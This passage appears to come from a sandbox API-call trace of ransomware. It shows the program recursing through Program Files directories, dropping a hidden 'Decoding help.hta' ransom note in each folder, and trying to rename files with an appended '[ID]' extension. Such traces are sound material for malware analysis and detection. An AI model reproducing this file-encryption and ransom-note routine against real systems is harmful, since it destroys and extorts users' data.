(x86)\\Common Files\\Java", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\*.*" [0039.074] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94f0868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.094] CloseHandle (hObject=0x1ac) returned 1 [0039.094] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xec355540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xec355540, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0039.094] lstrcmpW (lpString1=".", lpString2="microsoft shared") returned -1 [0039.094] lstrcmpW (lpString1="..", lpString2="microsoft shared") returned -1 [0039.094] lstrcmpiW (lpString1="windows", lpString2="microsoft shared") returned 1 [0039.094] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" [0039.094] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned 43 [0039.094] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\", lpString2="microsoft shared" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared" [0039.094] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\*.*" [0039.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4148250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.104] CloseHandle (hObject=0x1ac) returned 1 [0039.104] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0039.104] lstrcmpW (lpString1=".", lpString2="Services") returned -1 [0039.104] lstrcmpW (lpString1="..", lpString2="Services") returned -1 [0039.104] lstrcmpiW (lpString1="windows", lpString2="Services") returned 1 [0039.105] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" [0039.105] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned 43 [0039.105] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\", lpString2="Services" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services" [0039.105] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Services\\*.*" [0039.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41602b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.117] CloseHandle (hObject=0x1ac) returned 1 [0039.117] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0039.117] lstrcmpW (lpString1=".", lpString2="SpeechEngines") returned -1 [0039.117] lstrcmpW (lpString1="..", lpString2="SpeechEngines") returned -1 [0039.117] lstrcmpiW (lpString1="windows", lpString2="SpeechEngines") returned 1 [0039.118] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" [0039.118] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned 43 [0039.118] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\", lpString2="SpeechEngines" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines" [0039.118] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\*.*" [0039.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9550a08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.134] CloseHandle (hObject=0x1ac) returned 1 [0039.134] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9c11cf80, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0x9c11cf80, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0039.134] lstrcmpW (lpString1=".", lpString2="System") returned -1 [0039.134] lstrcmpW (lpString1="..", lpString2="System") returned -1 [0039.134] lstrcmpiW (lpString1="windows", lpString2="System") returned 1 [0039.135] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*" [0039.135] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\*.*") returned 43 [0039.135] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\", lpString2="System" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System" [0039.135] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\*.*" [0039.135] GlobalMemoryStatus (in: lpBuffer=0x47cfd10 | out: lpBuffer=0x47cfd10) [0039.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95c9c18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.147] CloseHandle (hObject=0x1ac) returned 1 [0039.147] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x47cfd30 | out: lpFindFileData=0x47cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9c11cf80, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0x9c11cf80, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0039.147] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 35 os_tid = 0xac0 [0039.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*", lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a53b0 [0039.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.070] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.070] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.070] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.070] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.070] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.070] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.071] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.071] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.072] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US" [0039.072] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0039.072] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94d8800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec [0039.091] CloseHandle (hObject=0x1ec) returned 1 [0039.091] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f55643f, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x5f55643f, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x23ff2d20, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0039.091] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.091] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.091] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0xffffffff [0039.091] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0039.092] WriteFile (in: hFile=0x1ec, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x490fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x490fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.092] CloseHandle (hObject=0x1ec) returned 1 [0039.092] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.093] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hmmapi.dll") returned -1 [0039.093] lstrlenW (lpString="hmmapi.dll") returned 10 [0039.093] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.093] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.093] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="hmmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll" [0039.093] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll" [0039.093] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.093] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.102] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9a30bbb, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0xb9a30bbb, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0xb9a30bbb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xa59, dwReserved0=0x0, dwReserved1=0x0, cFileName="ie8props.propdesc", cAlternateFileName="")) returned 1 [0039.102] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.102] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.102] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.102] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.103] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ie8props.propdesc") returned -1 [0039.103] lstrlenW (lpString="ie8props.propdesc") returned 17 [0039.103] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.103] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="ie8props.propdesc" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc" [0039.103] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc" [0039.103] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc.[ID]g9uZrLhJaygpwRm1[ID]" [0039.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.103] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37b6f98, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="iecompat.dll", cAlternateFileName="")) returned 1 [0039.103] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.103] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.103] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.103] lstrcmpiW (lpString1="Decoding help.hta", lpString2="iecompat.dll") returned -1 [0039.103] lstrlenW (lpString="iecompat.dll") returned 12 [0039.103] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.103] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="iecompat.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll" [0039.103] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll" [0039.103] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll" (normalized: "c:\\program files\\internet explorer\\iecompat.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\iecompat.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.103] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37dd0f9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf7600, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll", cAlternateFileName="")) returned 1 [0039.103] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.104] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.104] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.104] lstrcmpiW (lpString1="Decoding help.hta", lpString2="iedvtool.dll") returned -1 [0039.104] lstrlenW (lpString="iedvtool.dll") returned 12 [0039.104] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.104] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.104] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="iedvtool.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll" [0039.104] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll" [0039.104] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll" (normalized: "c:\\program files\\internet explorer\\iedvtool.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\iedvtool.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.112] FindNextFileW (in: hFindFile=0x5a53b0, lpFindFileData=0x490fd30 | out: lpFindFileData=0x490fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x41e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0039.112] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.112] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.112] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" [0039.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\decoding help.hta")) returned 0x1 [0039.112] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ieinstal.exe") returned -1 [0039.112] lstrlenW (lpString="ieinstal.exe") returned 12 [0039.112] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0039.112] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned 42 [0039.112] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\", lpString2="ieinstal.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe" [0039.112] 